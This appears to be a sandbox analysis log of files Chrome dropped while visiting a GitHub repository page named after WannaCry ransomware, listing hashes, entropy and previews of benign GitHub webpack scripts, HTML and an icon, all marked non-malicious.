                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["ui_packages_trusted-types-policies_policy_ts-ui_packages_trusted-types_trusted-types_ts-node_-38f8f1","vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-ffadee0","vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-ffadee1","vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-ffadee2","vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-ffadee3"],{79697:(e,t,n)=>{let i;n.d(t,{YT:()=>p,qP:()=>h,yM:()=>m});var r=n(88149),s=n(86058),o=n(56363),a=n(43786);let{getItem:l}=(0,o.Z)("localStorage"),c="dimension_",u=["utm_source","utm_medium","utm_campaign","utm_term","utm_content","scid"];try{let e=(0,r.n)("octolytics");delete e.baseContext,i=new s.R(e)}catch(e){}function d(e){let t=(0,r.n)("octolytics").baseContext||{};if(t)for(let[e,n]of(delete t.app_i
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (12492)
                                                                                      Category:dropped
                                                                                      Size (bytes):12634
                                                                                      Entropy (8bit):5.351914695394069
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:1jILFiy+hVkqslUmTlR8QZ/ph9D/LhreZ6xodq4Xzxxp/VWO6jvgoK:1qSkqkU+ekhre6odq4DrxMM
                                                                                      MD5:B7504832B119C9CB70E11119C79767C7
                                                                                      SHA1:C112FE32D8FE75EA55FB241582F0C13C36F69CD6
                                                                                      SHA-256:F43013567E45FF6BB277297A66761138559B810D06680065DDA761A5B6DEBC65
                                                                                      SHA-512:239B92C64D22D18B99D184A3869FD69ECCD176FE17887ECC0E506C10C110E318AE9C7D726E4D8B8F0227043884645DBD9F1B177EDC10ED0DFB735F23FDEB96E5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["ui_packages_commit-attribution_index_ts-ui_packages_commit-checks-status_index_ts-ui_packages-a73d65"],{53924:(e,t,a)=>{a.d(t,{D:()=>j,C:()=>D});var r=a(85893),o=a(79804),i=a(22326),n=a(42483),l=a(73290),s=a(97011);function c(e){return e.path?.startsWith("/apps/")??!1}var d=a(65379);function u({renderTooltip:e,author:t,children:a}){return!1===e?(0,r.jsx)(r.Fragment,{children:a}):(0,r.jsx)(d.Z,{"aria-label":`commits by ${t.login}`,direction:"se",children:a})}try{u.displayName||(u.displayName="AuthorTooltip")}catch{}var h=a(9996),x=a.n(h),p=a(67294);let m={fontWeight:"bold",fontColor:"fg.default",includeTooltip:!1,avatarSize:void 0},f=(0,p.createContext)(m);function g({authorSettings:e,children:t}){let a=x()(m,e??{});return(0,r.jsx)(f.Provider,{value:a,children:t})}function y(){return(0,p.useContext)(f)||m}try{f.displayName||(f.displayName="AuthorSettingsContext")}catch{}try{g.displayName||(g.displayName="AuthorSe
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (9530)
                                                                                      Category:dropped
                                                                                      Size (bytes):9673
                                                                                      Entropy (8bit):5.110368508179094
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Z52DslWcdSXhFK7i+1m4cwBo+GUI4QC4NpgO36:ZesEcdSxFP+c47onUIdE
                                                                                      MD5:860DC3E6A1C1E0C9B2D4174CEB797F8D
                                                                                      SHA1:7F56F53168581DF0D02FE382691C12E546A1A5C6
                                                                                      SHA-256:50F58FD78AC2C94525651DA898F9478B5E0C3FADF16271BDF47E0F833D98C130
                                                                                      SHA-512:5CDB6954F6DE9A5FFA993300F0D965CA9DAD006FABEFA9D56BB02BAD23E12934E20D9866B341452E34B6C845528A25D690F10EE0A3F25ABA04DEA67714F7F038
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-ffadee0","vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-ffadee1","vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-ffadee2","vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-ffadee3"],{86058:(e,t,n)=>{n.d(t,{R:()=>AnalyticsClient});var i=n(82918);let AnalyticsClient=class AnalyticsClient{constructor(e){this.options=e}get collectorUrl(){return this.options.collectorUrl}get clientId(){return this.options.clientId?this.options.clientId:(0,i.b)()}createEvent(e){return{page:location.href,title:document.title,context:{...this.options.baseContext,...e}}}sendPageView(e){let t=this.createEvent(e);this.send({page_views:[t]})}sendEvent(e,t){let n={...this.createEvent(t),type:e};this.send({events
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1616)
                                                                                      Category:dropped
                                                                                      Size (bytes):144472
                                                                                      Entropy (8bit):5.324149462645272
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:frfpoQvMBy2nzN7d3hBjSX+kb2d7EmjnkgX+mU56xtZQwBc1GzE29fVca/DuqJRA:KPDuqJRfWAVSgE29xxspm0n1vuz3k97J
                                                                                      MD5:2EFDABA6F9CD6B8722CF5A0AB920279C
                                                                                      SHA1:E3B12421CF78866E1C64917520C5427E8B0FC7CF
                                                                                      SHA-256:0F41080A7F69BF6945DCB8FBD426C69B0103E5142C3260C514E02C9A67533C0F
                                                                                      SHA-512:B43A2FB68C218F6B7E7ED89B5912077A3EEE6BD7EBE1E3BC637E881C90BF867D8C6322C99918A9BECEE63769AC96913BE50F6E1EDA7CF918A3829859BD8AD4AB
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:......<!DOCTYPE html>.<html. lang="en". . data-color-mode="auto" data-light-theme="light" data-dark-theme="dark". data-a11y-animated-images="system" data-a11y-link-underlines="true". >..... <head>. <meta charset="utf-8">. <link rel="dns-prefetch" href="https://github.githubassets.com">. <link rel="dns-prefetch" href="https://avatars.githubusercontent.com">. <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com">. <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/">. <link rel="preconnect" href="https://github.githubassets.com" crossorigin>. <link rel="preconnect" href="https://avatars.githubusercontent.com">.. ... <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-0eace2597ca3.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a167e256da9c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" med
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):303577
                                                                                      Entropy (8bit):5.447635357233737
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:vTy3TpmSHHtlg49LtTfu4XNBz16TPYTwdPKgk5ZwEsLL63zXkW1HsKhhv/gg7MDT:vTyDpm0nu4Xp6jYEWv11hhv/17MD9x6q
                                                                                      MD5:44989714A9AA0D1B2C6A008724D9DF10
                                                                                      SHA1:2239DC9357BE16F947D92698AACDBC0504FCB244
                                                                                      SHA-256:F6C585AC73688B94DFB1A9BAED44B2401DD32D3205208E5332FA63F5BE62FB69
                                                                                      SHA-512:C04A0C63417C53B184697EDF867F267479B9275AB3AE97A3255F8EAB9BA5600C5CF09A66BFE2CB60BDA8C992B6EDB07DF7B67CEA294709C86CAB3E9A4C4F391A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["react-code-view"],{46263:(e,t,n)=>{function r(e,t=0,{start:n=!0,middle:r=!0,once:i=!1}={}){let a,o=0,l=!1;function s(...c){if(l)return;let d=Date.now()-o;o=Date.now(),n?(n=!1,e.apply(this,c),i&&s.cancel()):(r&&d<t||!r)&&(clearTimeout(a),a=setTimeout(()=>{o=Date.now(),e.apply(this,c),i&&s.cancel()},r?t-d:t))}return s.cancel=()=>{clearTimeout(a),l=!0},s}function i(e,t=0,{start:n=!1,middle:i=!1,once:a=!1}={}){return r(e,t,{start:n,middle:i,once:a})}n.d(t,{D:()=>i,P:()=>r})},90836:(e,t,n)=>{n.d(t,{Z:()=>g});var r=n(86010),i=n(67294),a=n(15388),o=n(42379),l=n(42483),s=n(15173),c=n(26012),d=n(11791),u=n(20917),h=n(7261),p=n(9996),m=n.n(p);let f=a.ZP.span.withConfig({displayName:"AvatarStack__AvatarStackWrapper",componentId:"sc-4pdg6v-0"})(["--avatar-border-width:1px;--avatar-two-margin:calc(var(--avatar-stack-size) * -0.55);--avatar-three-margin:calc(var(--avatar-stack-size) * -0.85);display:flex;position:relative;hei
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:PNG image data, 144 x 144, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):14426
                                                                                      Entropy (8bit):7.9795666146409525
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:7ds+UWWRuWf5kTqhc+Ci2EeUIWDA8uDAHGUkNW53kq4u/F7vlg+XEgoZib8EbYFB:7q+RWxf5q4R24IDOZ424hZ+8xQaFH
                                                                                      MD5:603ACD083C6E628CDA0184B6B0FCEF21
                                                                                      SHA1:CCDA6EDB7E27B25E66F9BA4B6DC26D3A77ED6949
                                                                                      SHA-256:E081CCFAFBA52C0D2D05278D61D9341A83ABAE3BE7AE97229E75786A9B969FD1
                                                                                      SHA-512:D7CD8B7FF57C2189EBE8DFF037C2F2E8CB4AF90900041D723F6763ED5A213D206E985B13FB88F477891A6E4E497FC77DB991F3227C84A3D95626479521C5AA35
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.PNG........IHDR..............F... .IDATx..}w......).}..... .b..Q,.!...k0~.Fc.5..cD..[.%.k.=...&.K......*.0.a.0..Y..9..~.^k...0.....70s.>....k=.Q....@h}..9.;...v..)..=.u..g_'..s..D........d./....}qB..z[SJ...0........H.V...?I_.X...\.u...^.9.a./Q.x.v...60... ....~....1>O).$..R.Y6.v.8F..tH.9mXL....q.$....;..w.A.....6|.......Ow|...?.9........e(.Tr...{..n1nyv%...0..._{.1..;`.B!.....&.vG.g)...6..?k.H.U...F..xc.8a...\.8[.r.AY..D.r.9_V.....}...g.....r.....l6E)...J`..6...9.J.......$..B......0.u.k.....#%..)....sR.?r.......].\eL.c.M.........V8.;wv..X`..xC......H).k..!:...r[0....v....N...q..(.S..F......*..\...I...J!D3'3s.>.(..&B....&=...-#....".'O.;A.....r.]A.;-B.vO....E..x...8.........8|.<..e...k..{....x.U......,4@..3....@..8.'[.R."..0.....w.Y.B.[..55-R.K(.OL. ]5N#[.E=..........]wVdD..so..p=..%.....)@'..-.z-.....m...X.k.q'./h....Or.n.1..I.~u-.8...%....W.)rJ..).?E...ia.....................cG.s.'o......!M3....>BQ......%%()n.......M.6e....].6...JN..~HT.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:HTML document, ASCII text, with very long lines (8669)
                                                                                      Category:dropped
                                                                                      Size (bytes):8781
                                                                                      Entropy (8bit):5.147902612816303
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:8IMqkjtgz2FmtOj+elq88F3rI7huUG5OHGqu/3zPtkDCyZYinOwm3mqSSLXeuje5:GATOM88FycxOULECTiOwvqSeRS5/oy
                                                                                      MD5:C2E2AA6B71F1F9EBDAF6E3DCFD7ED3CA
                                                                                      SHA1:3619FC34F532598B62B17CC33DB2E055A30E0511
                                                                                      SHA-256:B0FA3BE468AEFB81DFC9E0C3B6AECE3BD418EB19E78255F0189CDEECB3F9092A
                                                                                      SHA-512:80FD8EE004067725715B970C2E1A6868B9C2EEE1B765D401B1200561AC44EA7F4AA3484450608208050FEDC961EEF1F9BDAE569DBCD9EC385E7348ACBD03A03A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["ui_packages_cookie-consent-link-element_cookie-consent-link-element_ts"],{30640:(e,o,t)=>{t.r(o),t.d(o,{CookieConsentLinkElement:()=>i});var r=t(76006),a=t(63276);let i=class CookieConsentLinkElement extends HTMLElement{showConsentManagement(){(0,a._8)()}};i=function(e,o,t,r){var a,i=arguments.length,n=i<3?o:null===r?r=Object.getOwnPropertyDescriptor(o,t):r;if("object"==typeof Reflect&&"function"==typeof Reflect.decorate)n=Reflect.decorate(e,o,t,r);else for(var s=e.length-1;s>=0;s--)(a=e[s])&&(n=(i<3?a(n):i>3?a(o,t,n):a(o,t))||n);return i>3&&n&&Object.defineProperty(o,t,n),n}([r.Ih],i)},63276:(e,o,t)=>{t.d(o,{gy:()=>b,Ho:()=>C,_$:()=>k,Wu:()=>g,Rw:()=>w,mO:()=>f,_8:()=>v,lc:()=>$});var r,a,i=t(89909),n=t(64799);!function(e){e.Required="Required",e.Analytics="Analytics",e.SocialMedia="SocialMedia",e.Advertising="Advertising"}(r||(r={})),function(e){e.Required="Required",e.Analytics="Analytics",e.SocialMedia="Soci
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (6711)
                                                                                      Category:dropped
                                                                                      Size (bytes):6853
                                                                                      Entropy (8bit):5.31812859150798
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:a4EbIQVRDhHgI+O5KxmEyk1x8GpEIJ281/VKKjyaIFL:E1HgIxK4k1OGpEOK
                                                                                      MD5:CC858B9A34858998956ACC35BE3FF80A
                                                                                      SHA1:4A8B0586F8CB6DCBFE4135FA27AC666355F63FD0
                                                                                      SHA-256:ACEFF0E4028BAAF35D9C77C5F06E773546254F9414FA2C5E976C6EC106FDF981
                                                                                      SHA-512:4A2CF4AD7F608B8E9B9B35C4B078614CC4C0B2CA27D76CBFA1A5404167EFA1EA810F2EF336416AE096C48A32FA066965BB39C419683D075D6F35FCEDFC842658
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["ui_packages_react-core_create-browser-history_ts-ui_packages_react-core_AppContextProvider_ts-809ab9"],{47658:(e,t,r)=>{r.d(t,{n:()=>o});var a=r(85893),n=r(67294),s=r(15470);function o({children:e,appName:t,category:r,metadata:o}){let l=(0,n.useMemo)(()=>({appName:t,category:r,metadata:o}),[t,r,o]);return(0,a.jsx)(s.f.Provider,{value:l,children:e})}try{o.displayName||(o.displayName="AnalyticsProvider")}catch{}},15470:(e,t,r)=>{r.d(t,{f:()=>n});var a=r(67294);let n=(0,a.createContext)(null)},32458:(e,t,r)=>{r.d(t,{Z:()=>a});let a=()=>void 0},40940:(e,t,r)=>{r.d(t,{I:()=>n});var a=r(67294);let n=(0,a.createContext)(null)},7533:(e,t,r)=>{r.d(t,{l:()=>n});var a=r(12599);function n(e={}){let t;let r=(0,a.lX)({...e,v5Compat:!0}),n=[],s=!1;function o(e){if(n.length>0)for(let t of n)t({retry(){e()}});else e()}return r.listen(e=>{if(s){s=!1;return}if(e.action===a.aU.Pop&&n.length&&null!==e.delta&&n.length>0){let t=e.delt
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (16577)
                                                                                      Category:dropped
                                                                                      Size (bytes):18862
                                                                                      Entropy (8bit):5.174500907499085
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:/W/dd8WWkdjjEK2nkBqywgMRNpMRil4ZLFtnyUHjWRIbdbrxVlRc2+SvgyYV08cW:/W/r8WWkdPE7kBqLgM+Ril4ZLFtnyUH0
                                                                                      MD5:1908A7D9985E9540B3F6FC047F62B729
                                                                                      SHA1:25A06882E338DA16BBC59797925AC6086141F478
                                                                                      SHA-256:1B92B8A1D5169E64EDCE1FB248CB5989561060B083E5F05B6CA2A823B748A946
                                                                                      SHA-512:BC8F02B96749A7EC00A92334C4964A4255611B23E15B88A9FEF73FCE2B55E32BFEFA7F4BB89D436685A92FE188713790B9154ED79B5D7B3690A3ACE68346CADF
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0"],{10160:(e,t,n)=>{n.d(t,{Z:()=>Combobox});let Combobox=class Combobox{constructor(e,t,{tabInsertsSuggestions:n,firstOptionSelectionMode:i,scrollIntoViewOptions:r}={}){this.input=e,this.list=t,this.tabInsertsSuggestions=null==n||n,this.firstOptionSelectionMode=null!=i?i:"none",this.scrollIntoViewOptions=null!=r?r:{block:"nearest",inline:"nearest"},this.isComposing=!1,t.id||(t.id=`combobox-${Math.random().toString().slice(2,6)}`),this.ctrlBindings=!!navigator.userAgent.match(/Macintosh/),this.keyboardEventHandler=e=>(function(e,t){if(!e.shiftKey&&!e.metaKey&&!e.altKey&&(t.ctrlBindings||!e.ctrlKey)&&!t.isComposing)switch(e.key){case"Enter":o(t.input,t.list)&&e.preventDefault();break;case"Tab":t.tabInsertsSuggestions&&o(t.input,t.list)&&e.preventDefault();break;case"Escape":t.clearSelection();break;case"ArrowDown":t
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (13964)
                                                                                      Category:dropped
                                                                                      Size (bytes):14106
                                                                                      Entropy (8bit):5.3564963398021765
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:c9/bl5dZq4BlBhwBC7cBc8UmXG99Tsvnr9YmDRhPy052hc2ZUWwYL+earUsM+ZmH:M5HyLPbUJqQZStVx5G
                                                                                      MD5:0EBF88B18838CA3926ECE77027C1A096
                                                                                      SHA1:0F2EDC27F5A23E5C2F699443C0D6572904B7BFD2
                                                                                      SHA-256:452A443EFADF60DA1B19B9BF50D6CBBB25AB9441A3E9FE73B678D9CD486D80B6
                                                                                      SHA-512:79F9611C275BF2087D6B063E2F4BF13FEDDAB30C494B7BC968169FDDF15A451AA26FE231FFE9E2EB4B9923477528CE638F5688CF4930953D372DF69E822FFB44
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183"],{28382:(t,e,r)=>{r.d(e,{Q:()=>o});var n="<unknown>";function o(t){return t.split("\n").reduce(function(t,e){var r,o,f,d=function(t){var e=i.exec(t);if(!e)return null;var r=e[2]&&0===e[2].indexOf("native"),o=e[2]&&0===e[2].indexOf("eval"),a=l.exec(e[2]);return o&&null!=a&&(e[2]=a[1],e[3]=a[2],e[4]=a[3]),{file:r?null:e[2],methodName:e[1]||n,arguments:r?[e[2]]:[],lineNumber:e[3]?+e[3]:null,column:e[4]?+e[4]:null}}(e)||((r=a.exec(e))?{file:r[2],methodName:r[1]||n,arguments:[],lineNumber:+r[3],column:r[4]?+r[4]:null}:null)||function(t){var e=u.exec(t);if(!e)return null;var r=e[3]&&e[3].indexOf(" > eval")>-1,o=p.exec(e[3]);return r&&null!=o&&(e[3]=o[1],e[4]=o[2],e[5]=null),{file:e[3],methodName:e[1]||n,arguments:e[2]?e[2].split(","):[],lineNumber:e[4]?+e[4]:null,column:e[5]?+e[5]:null}}(e)||((o=s.exec(e))?{file:o[2],
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):239
                                                                                      Entropy (8bit):4.8182914609695064
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YW4IFt+g4Yabke3gmQ81tGD5s/0AMDe8YvELX/V:YW4IF4nZAeQmXCsSDe8YvuN
                                                                                      MD5:BB7069AC14A746FC1B2599598D6A4E3D
                                                                                      SHA1:D35B19027CAF859A0AB2FA63F9F71502F7C2C051
                                                                                      SHA-256:3CA1CB8AC06E96DA0082E70BD7B7C4081D09CA1664B41200AF91E04F157366C9
                                                                                      SHA-512:9857285635411A6A8DA9F1DD4B06462B14417E58218326CDBE1AB5CC9D1691C6D9FDF468DE878AE7EDDBAE37863C107A70915DD927A7BB2871CD29105243AA45
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{"showLicenseMeta":false,"license":null,"newIssuePath":"/chronosmiki/RANSOMWARE-WANNACRY-2.0/issues/new","newDiscussionPath":null,"codeownerInfo":{"codeownerPath":null,"ownedByCurrentUser":null,"ownersForFile":null,"ruleForPathLine":null}}
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (11764)
                                                                                      Category:dropped
                                                                                      Size (bytes):11878
                                                                                      Entropy (8bit):5.500003424939645
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:lmurkDE9Doawu9nc9wnWHlMoeUC/9Jj7fbB2t07ueq9CBUCpypdlMyA:4E90W9nEwWHqN9J/bot07dqIpy7eyA
                                                                                      MD5:882458FD04512E36B8C2CFCAF4C39D56
                                                                                      SHA1:90B8BB12E04388B32839D8EB3C0D80A15B0A05B6
                                                                                      SHA-256:4A94CFD66FF516EB9F48A5B6C486F9329DC956D5C5D9480873EE60EBF6F0695E
                                                                                      SHA-512:8044B2E5214615032C8A302CF63284CF900DB82B593C8DD38C43A2664856D85282DA375C7612244A173AD4A8918C6D1CE1792454FC15F8BA52C3795190167FE5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["ui_packages_code-view-shared_components_files-search_FileResultsList_tsx"],{13275:(e,r,t)=>{t.d(r,{z:()=>a});function a(e,r,{direction:t="vertical",startMargin:a=0,endMargin:n=0,behavior:l="smooth"}={}){let i="vertical"===t?"top":"left",s="vertical"===t?"bottom":"right",o="vertical"===t?"scrollTop":"scrollLeft",{[i]:c,[s]:u}=e.getBoundingClientRect(),{[i]:d,[s]:f}=r.getBoundingClientRect();if(c<d+a){let e=c-d+r[o];r.scrollTo({behavior:l,[i]:e-a})}else if(u>f-n){let e=u-f+r[o];r.scrollTo({behavior:l,[i]:e+n})}}},47142:(e,r,t)=>{t.d(r,{CD:()=>o,DU:()=>n,Gs:()=>i,m7:()=>s});var a=-1/0,n=1/0;function l(e,r,t,n){for(var l=e.length,i=r.length,s=e.toLowerCase(),o=r.toLowerCase(),c=function(e){for(var r=e.length,t=Array(r),a="/",n=0;n<r;n++){var l,i=e[n];"/"===a?t[n]=.9:"-"===a||"_"===a||" "===a?t[n]=.8:"."===a?t[n]=.6:(l=a).toLowerCase()===l&&i.toUpperCase()===i?t[n]=.7:t[n]=0,a=i}return t}(r,c),u=0;u<l;u++){t[u]=Array
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (13300)
                                                                                      Category:dropped
                                                                                      Size (bytes):13385
                                                                                      Entropy (8bit):5.373246954585399
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:auNURb64ofyv8rmkIO8PZucMQzByYA4CrTVFNcityx86/Wt1E8FAo7n6OxdD5:XGZCyvimkIO8huVrYlA5D6W9FDn6OV
                                                                                      MD5:C706AD84A4EB261B75D1F77CE7F9BDC8
                                                                                      SHA1:497A9725442E7305ADC54D19B828B2E38C5C56CD
                                                                                      SHA-256:80B561C1746EF1533744E7BF7EA3F6C721A88A104D665BB97FFA8DF96E69B682
                                                                                      SHA-512:72C9FBDE5AD471C76B76034459D0D75DB00CCEAF3904A14C01DD9DD9167DA7F783086B79C446B24ED2630C9CEBCA1996B3FF8EA52DEC6C865F173C8158962BE6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_color-convert_index_js"],{48168:(e,n,t)=>{let r=t(39092),l={};for(let e of Object.keys(r))l[r[e]]=e;let a={rgb:{channels:3,labels:"rgb"},hsl:{channels:3,labels:"hsl"},hsv:{channels:3,labels:"hsv"},hwb:{channels:3,labels:"hwb"},cmyk:{channels:4,labels:"cmyk"},xyz:{channels:3,labels:"xyz"},lab:{channels:3,labels:"lab"},lch:{channels:3,labels:"lch"},hex:{channels:1,labels:["hex"]},keyword:{channels:1,labels:["keyword"]},ansi16:{channels:1,labels:["ansi16"]},ansi256:{channels:1,labels:["ansi256"]},hcg:{channels:3,labels:["h","c","g"]},apple:{channels:3,labels:["r16","g16","b16"]},gray:{channels:1,labels:["gray"]}};for(let n of(e.exports=a,Object.keys(a))){if(!("channels"in a[n]))throw Error("missing channels property: "+n);if(!("labels"in a[n]))throw Error("missing channel labels property: "+n);if(a[n].labels.length!==a[n].channels)throw Error("channel and label counts mismatch: "+n);let{channels:e,labels:t}
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (11421)
                                                                                      Category:dropped
                                                                                      Size (bytes):11556
                                                                                      Entropy (8bit):5.218285203943703
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:5It/MPHQGwYE7NHe/Krq/FKcynzJ2Cus4gtYQbtmKyjwD/f7wEhoHwNqdZ7U:Q0dE7NHeyrq/wcyzJ2C0sbkKqa/f8DHY
                                                                                      MD5:8007958DDFC8DAA0B2E13540D70E1FB4
                                                                                      SHA1:83EC5C75AC8949E857D2E464D4828075B523694E
                                                                                      SHA-256:9910485F50C52D485EFA9A014664835CD3435C6C430804734C94646A27C3A7E6
                                                                                      SHA-512:D0256EBFF5CDD21C9B2A16E7F79F31D9607337C3A38AF500698B9CCFB3E858127A88C464BB72B00D47276F6C4F2E5CDF4F6EE66DBE243D7DD4FDE38A59FD1BA8
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js"],{59753:(e,t,n)=>{function o(){if(!(this instanceof o))return new o;this.size=0,this.uid=0,this.selectors=[],this.selectorObjects={},this.indexes=Object.create(this.indexes),this.activeIndexes=[]}n.d(t,{f:()=>O,S:()=>C,on:()=>E});var r,a=window.document.documentElement,i=a.matches||a.webkitMatchesSelector||a.mozMatchesSelector||a.oMatchesSelector||a.msMatchesSelector;o.prototype.matchesSelector=function(e,t){return i.call(e,t)},o.prototype.querySelectorAll=function(e,t){return t.querySelectorAll(e)},o.prototype.indexes=[];var s=/^#((?:[\w\u00c0-\uFFFF\-]|\\.)+)/g;o.prototype.indexes.push({name:"ID",selector:function(e){var t;if(t=e.match(s))return t[0].slice(1)},element:function(e){if(e.id)return[e.id]}});var l=/^\.((?:[\w\u00c0-\uFFFF\-]|\\.)+)/g;o.prototype.indexes.push({name:"CLASS",selector:function(e){var t;if(t=e
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (11987)
                                                                                      Category:dropped
                                                                                      Size (bytes):12037
                                                                                      Entropy (8bit):5.305136019314904
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:2/Oh0nPtu8glgCYTYBKWHofgu6BY0ASYD2hMZuyPRff4frnSsMj09gzr5:7S1glg3toDY0AS6tcIRf8rSsW0U
                                                                                      MD5:15353E276F2A35C6994E46991D8A9B1C
                                                                                      SHA1:37C41A00574AE955D36DD0E5288F4AE32A18E048
                                                                                      SHA-256:7776EB5163B1EF5E527A065EE8701FB023F5D4292BD471AF5F594C0C4F33F7A7
                                                                                      SHA-512:694C8423E3475A2E4C99D721F5DBC4DBF324FE3796E47101147753B191F032081687F9765A981207992DA09A9B209A1D4D314D25621E08D811E2CF04A0403197
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["sessions"],{9238:(e,t,n)=>{n.d(t,{ZG:()=>s,q6:()=>c,w4:()=>u});var o=n(8439);let r=!1,i=new o.Z;function a(e){let t=e.target;if(t instanceof HTMLElement&&t.nodeType!==Node.DOCUMENT_NODE)for(let e of i.matches(t))e.data.call(null,t)}function s(e,t){r||(r=!0,document.addEventListener("focus",a,!0)),i.add(e,t),document.activeElement instanceof HTMLElement&&document.activeElement.matches(e)&&t(document.activeElement)}function u(e,t,n){function o(t){let r=t.currentTarget;r&&(r.removeEventListener(e,n),r.removeEventListener("blur",o))}s(t,function(t){t.addEventListener(e,n),t.addEventListener("blur",o)})}function c(e,t){function n(e){let{currentTarget:o}=e;o&&(o.removeEventListener("input",t),o.removeEventListener("blur",n))}s(e,function(e){e.addEventListener("input",t),e.addEventListener("blur",n)})}},45119:(e,t,n)=>{n.d(t,{Hu:()=>d,_8:()=>u,cj:()=>s});var o=n(69567),r=n(36071);let i="github-mobile-auth-flash";functi
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (12247)
                                                                                      Category:dropped
                                                                                      Size (bytes):12386
                                                                                      Entropy (8bit):5.128636043617727
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:+9OYNH5WvjGfovWH2eizX7rVEDrlkvImX:+/K+HCrOlkvImX
                                                                                      MD5:84EEE0A0D2D52CE4048F2DBDB3589012
                                                                                      SHA1:9723F142FF6CE47F65DFED06D70B68A305A8DBB8
                                                                                      SHA-256:BF11813CE0246DA52CB3132837619C44D1E837E3EEEBBBEF12137DD91DFBEC7F
